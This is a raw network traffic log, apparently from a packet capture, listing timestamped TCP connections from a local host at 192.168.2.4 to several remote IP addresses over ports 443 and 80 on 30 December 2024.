                                                                                                                                                                                    Dec 30, 2024 11:51:03.588948965 CET44349750142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:03.589184046 CET49750443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:03.589188099 CET44349750142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:03.750119925 CET44349747142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:03.750201941 CET49747443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:03.750214100 CET44349747142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:03.750262022 CET49747443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:03.751482964 CET44349747142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:03.751537085 CET44349747142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:03.751540899 CET49747443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:03.751576900 CET49747443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:03.766752005 CET44349748142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:03.766830921 CET49748443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:03.766848087 CET44349748142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:03.766887903 CET49748443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:03.767299891 CET44349748142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:03.767350912 CET44349748142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:03.767391920 CET49748443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:03.775621891 CET49747443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:03.775643110 CET44349747142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:03.776420116 CET49755443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:03.776460886 CET44349755142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:03.776566029 CET49755443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:03.776751041 CET49755443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:03.776765108 CET44349755142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:03.793909073 CET49748443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:03.793941975 CET44349748142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:03.794671059 CET49756443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:03.794711113 CET44349756142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:03.794773102 CET49756443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:03.795939922 CET49756443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:03.795949936 CET44349756142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:03.861181021 CET44349749142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:03.861218929 CET44349749142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:03.861289978 CET49749443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:03.861315012 CET44349749142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:03.861335993 CET44349749142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:03.861383915 CET49749443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:03.863956928 CET49749443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:03.863972902 CET44349749142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:03.866306067 CET49757443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:03.866343975 CET44349757142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:03.866487980 CET49757443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:03.866736889 CET49757443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:03.866746902 CET44349757142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.002718925 CET44349750142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.002774000 CET44349750142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.002814054 CET49750443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:04.002849102 CET44349750142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.002871037 CET49750443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:04.002890110 CET49750443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:04.002897978 CET44349750142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.002911091 CET44349750142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.002935886 CET49750443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:04.002954960 CET49750443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:04.027966976 CET49750443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:04.028007984 CET44349750142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.028527975 CET49758443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:04.028570890 CET44349758142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.028630018 CET49758443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:04.028912067 CET49758443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:04.028923035 CET44349758142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.376004934 CET44349755142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.376113892 CET49755443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:04.396095991 CET44349756142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.396416903 CET49756443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:04.465548992 CET44349757142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.469758987 CET49757443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:04.535033941 CET49755443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:04.535060883 CET44349755142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.609471083 CET49755443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:04.609503984 CET44349755142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.609966040 CET49756443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:04.609987974 CET44349756142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.611953020 CET49756443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:04.611958981 CET44349756142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.613076925 CET49757443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:04.613094091 CET44349757142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.614770889 CET49757443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:04.614777088 CET44349757142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.656999111 CET44349758142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.657174110 CET49758443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:04.659306049 CET49758443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:04.659322977 CET44349758142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.659533978 CET49758443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:04.659538031 CET44349758142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.894509077 CET44349755142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.894598961 CET49755443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:04.894728899 CET49755443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:04.894763947 CET44349755142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.894915104 CET44349755142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.894920111 CET49755443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:04.894957066 CET49755443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:04.894977093 CET49755443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:04.895751953 CET49762443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:04.895807028 CET44349762142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.895867109 CET49762443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:04.896121025 CET49762443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:04.896132946 CET44349762142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.899251938 CET44349756142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.899332047 CET49756443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:04.899347067 CET44349756142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.899405956 CET49756443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:04.899776936 CET49756443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:04.899827003 CET44349756142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.899876118 CET49756443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:04.900216103 CET49763443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:04.900257111 CET44349763142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.900327921 CET49763443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:04.900816917 CET49763443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:04.900832891 CET44349763142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.947532892 CET44349757142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.947596073 CET44349757142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.947596073 CET49757443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:04.947613955 CET44349757142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.947673082 CET49757443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:04.947673082 CET49757443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:04.947679043 CET44349757142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.947705984 CET44349757142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.947779894 CET49757443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:04.949420929 CET49757443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:04.949435949 CET44349757142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.950133085 CET49764443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:04.950181961 CET44349764142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:04.950915098 CET49764443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:04.951308966 CET49764443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:04.951334000 CET44349764142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.111419916 CET44349758142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.111486912 CET44349758142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.111568928 CET49758443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:05.111607075 CET44349758142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.111625910 CET44349758142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.111654043 CET49758443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:05.111690998 CET49758443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:05.115618944 CET49758443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:05.115643978 CET44349758142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.116141081 CET49765443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:05.116193056 CET44349765142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.116272926 CET49765443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:05.116493940 CET49765443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:05.116504908 CET44349765142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.495683908 CET44349762142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.495776892 CET49762443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:05.496423006 CET44349762142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.496474981 CET49762443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:05.519586086 CET49762443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:05.519601107 CET44349762142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.519946098 CET44349762142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.520128012 CET49762443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:05.520742893 CET49762443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:05.526736021 CET44349763142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.526803017 CET49763443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:05.527475119 CET44349763142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.527534962 CET49763443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:05.530796051 CET49763443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:05.530817032 CET44349763142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.531111002 CET44349763142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.531300068 CET49763443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:05.531744957 CET49763443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:05.565495968 CET44349764142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.567342043 CET44349762142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.567492962 CET49764443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:05.568506002 CET49764443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:05.568516970 CET44349764142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.568967104 CET49764443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:05.568972111 CET44349764142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.579329967 CET44349763142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.716542006 CET44349765142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.716615915 CET49765443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:05.717021942 CET49765443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:05.717031956 CET44349765142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.717247009 CET49765443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:05.717251062 CET44349765142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.791354895 CET4974080192.168.2.469.42.215.252
                                                                                                                                                                                    Dec 30, 2024 11:51:05.791399956 CET49762443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:05.791420937 CET49763443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:05.791457891 CET49764443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:05.793093920 CET49768443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:05.793142080 CET44349768142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.793230057 CET49768443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:05.795417070 CET49768443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:05.795428991 CET44349768142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.806216002 CET49770443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:05.806241035 CET44349770142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:05.806299925 CET49770443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:05.807348013 CET49770443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:05.807357073 CET44349770142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.233906031 CET44349765142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.233967066 CET44349765142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.233983040 CET49765443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:06.234011889 CET44349765142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.234024048 CET49765443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:06.234072924 CET44349765142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.234102964 CET49765443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:06.234132051 CET49765443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:06.234862089 CET49765443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:06.234879971 CET44349765142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.403856039 CET44349768142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.403961897 CET49768443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:06.405755997 CET49768443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:06.405764103 CET44349768142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.406090021 CET49768443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:06.406094074 CET44349768142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.407399893 CET44349770142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.407471895 CET49770443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:06.407804966 CET49770443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:06.407809019 CET44349770142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.407937050 CET49770443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:06.407942057 CET44349770142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.769674063 CET44349768142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.769821882 CET49768443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:06.771092892 CET44349768142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.771141052 CET44349768142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.771189928 CET49768443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:06.771189928 CET49768443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:06.772505999 CET44349770142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.772577047 CET49770443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:06.772591114 CET44349770142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.772820950 CET49770443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:06.773829937 CET44349770142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.773874998 CET44349770142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.773890018 CET49770443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:06.774200916 CET49770443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:06.797359943 CET49768443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:06.797399044 CET44349768142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.797553062 CET49768443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:06.797590971 CET49768443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:06.798279047 CET49771443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:06.798320055 CET44349771142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.798392057 CET49771443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:06.798600912 CET49772443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:06.798635006 CET44349772142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.798798084 CET49772443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:06.799057961 CET49772443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:06.799067974 CET44349772142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.805732965 CET49770443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:06.805767059 CET44349770142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.806617975 CET49774443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:06.806638956 CET44349774142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.806700945 CET49773443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:06.806739092 CET44349773142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.806801081 CET49774443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:06.807018042 CET49773443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:06.807269096 CET49774443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:06.807285070 CET44349774142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.826857090 CET49771443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:06.826878071 CET44349771142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.830182076 CET49773443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:06.830203056 CET44349773142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.974663973 CET4977680192.168.2.469.42.215.252
                                                                                                                                                                                    Dec 30, 2024 11:51:06.979629040 CET804977669.42.215.252192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:06.979696035 CET4977680192.168.2.469.42.215.252
                                                                                                                                                                                    Dec 30, 2024 11:51:06.980257034 CET4977680192.168.2.469.42.215.252
                                                                                                                                                                                    Dec 30, 2024 11:51:06.985106945 CET804977669.42.215.252192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:07.405849934 CET44349772142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:07.405930042 CET49772443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:07.426058054 CET49772443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:07.426070929 CET44349772142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:07.429574013 CET44349773142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:07.429780006 CET49773443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:07.435374022 CET44349771142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:07.436253071 CET44349774142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:07.437594891 CET49774443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:07.437599897 CET49771443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:07.448586941 CET49772443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:07.448596954 CET44349772142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:07.451119900 CET49773443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:07.451132059 CET44349773142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:07.461947918 CET49773443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:07.461963892 CET44349773142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:07.469403982 CET49771443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:07.469430923 CET44349771142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:07.469613075 CET49771443192.168.2.4142.250.186.33
                                                                                                                                                                                    Dec 30, 2024 11:51:07.469618082 CET44349771142.250.186.33192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:07.473965883 CET49774443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:07.473978043 CET44349774142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:07.474275112 CET49774443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:07.474280119 CET44349774142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:07.783632994 CET44349772142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:07.783698082 CET49772443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:07.783720970 CET44349772142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:07.783767939 CET49772443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:07.783775091 CET44349772142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:07.783803940 CET44349772142.250.185.206192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:51:07.783821106 CET49772443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:07.783850908 CET49772443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:07.783870935 CET49772443192.168.2.4142.250.185.206
                                                                                                                                                                                    Dec 30, 2024 11:51:07.783885002 CET44349772142.250.185.206192.168.2.4
